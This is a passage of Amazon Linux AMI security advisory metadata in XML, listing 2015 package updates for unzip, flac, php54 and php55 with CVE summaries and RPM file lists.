arch="i686"><filename>Packages/postgresql8-server-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-2.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-504</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-504: medium priority package update for unzip</title><issued date="2015-04-15 21:48:00" /><updated date="2015-04-15 22:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9636:
A buffer overflow was found in the way unzip decompressed certain extra fields of a file. A specially crafted Zip archive could cause unzip to crash or, possibly, execute arbitrary code when the archive was tested with unzip's '-t' option.
CVE-2014-8141:
A buffer overflow flaw was found in the way unzip handled Zip64 files. A specially crafted Zip archive could possibly cause unzip to crash when the archive was extracted.
CVE-2014-8140:
An integer underflow flaw, leading to a buffer overflow, was found in the way unzip decompressed certain extra fields of a file. A specially crafted Zip archive could cause unzip to crash when the archive was tested with unzip's '-t' option.
CVE-2014-8139:
A buffer overflow flaw was found in the way unzip computed the CRC32 checksum of certain extra fields of a file. A specially crafted Zip archive could cause unzip to crash when the archive was tested with unzip's '-t' option.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8139" title="" id="CVE-2014-8139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8140" title="" id="CVE-2014-8140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8141" title="" id="CVE-2014-8141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9636" title="" id="CVE-2014-9636" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0700.html" title="" id="RHSA-2015:0700" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="unzip-debuginfo" version="6.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/unzip-debuginfo-6.0-2.9.amzn1.x86_64.rpm</filename></package><package name="unzip" version="6.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/unzip-6.0-2.9.amzn1.x86_64.rpm</filename></package><package name="unzip-debuginfo" version="6.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/unzip-debuginfo-6.0-2.9.amzn1.i686.rpm</filename></package><package name="unzip" version="6.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/unzip-6.0-2.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-505</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-505: important priority package update for flac</title><issued date="2015-04-15 21:48:00" /><updated date="2015-04-15 22:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9028:
A buffer overflow flaw was found in the way flac decoded FLAC audio files. An attacker could create a specially crafted FLAC audio file that could cause an application using the flac library to crash or execute arbitrary code when the file was read.
CVE-2014-8962:
A buffer over-read flaw was found in the way flac processed certain ID3v2 metadata. An attacker could create a specially crafted FLAC audio file that could cause an application using the flac library to crash when the file was read.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8962" title="" id="CVE-2014-8962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9028" title="" id="CVE-2014-9028" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0767.html" title="" id="RHSA-2015:0767" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="flac-devel" version="1.2.1" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/flac-devel-1.2.1-7.7.amzn1.x86_64.rpm</filename></package><package name="flac" version="1.2.1" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/flac-1.2.1-7.7.amzn1.x86_64.rpm</filename></package><package name="flac-debuginfo" version="1.2.1" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/flac-debuginfo-1.2.1-7.7.amzn1.x86_64.rpm</filename></package><package name="flac" version="1.2.1" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/flac-1.2.1-7.7.amzn1.i686.rpm</filename></package><package name="flac-devel" version="1.2.1" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/flac-devel-1.2.1-7.7.amzn1.i686.rpm</filename></package><package name="flac-debuginfo" version="1.2.1" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/flac-debuginfo-1.2.1-7.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-506</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-506: important priority package update for php54</title><issued date="2015-04-15 21:49:00" /><updated date="2015-04-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2331:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libzip, which is also embedded in PHP, processed certain ZIP archives. If an attacker were able to supply a specially crafted ZIP archive to an application using libzip, it could cause the application to crash or, possibly, execute arbitrary code.
1204676:
CVE-2015-2331 libzip: integer overflow when processing ZIP archives
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
A use-after-free flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass crafted input to PHP's unserialize() function, they could cause the PHP interpreter to crash or, possibly, execute arbitrary code.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331" title="" id="CVE-2015-2331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mssql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.39" release="1.67.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-debuginfo-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.39" 
release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.39-1.67.amzn1.i686.rpm</filename></package><package 
name="php54-pdo" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-snmp" 
version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-common" 
version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.39-1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-507</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-507: important priority package update for php55</title><issued date="2015-04-15 21:49:00" /><updated date="2015-04-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2331:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libzip, which is also embedded in PHP, processed certain ZIP archives. If an attacker were able to supply a specially crafted ZIP archive to an application using libzip, it could cause the application to crash or, possibly, execute arbitrary code.
1204676:
CVE-2015-2331 libzip: integer overflow when processing ZIP archives
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
A use-after-free flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass crafted input to PHP's unserialize() function, they could cause the PHP interpreter to crash or, possibly, execute arbitrary code.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331" title="" id="CVE-2015-2331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-gd" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package 
name="php55-embedded" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.23" release="1.99.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-snmp-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.23" 
release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.23" 
release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.23" release="1.99.amzn1" 
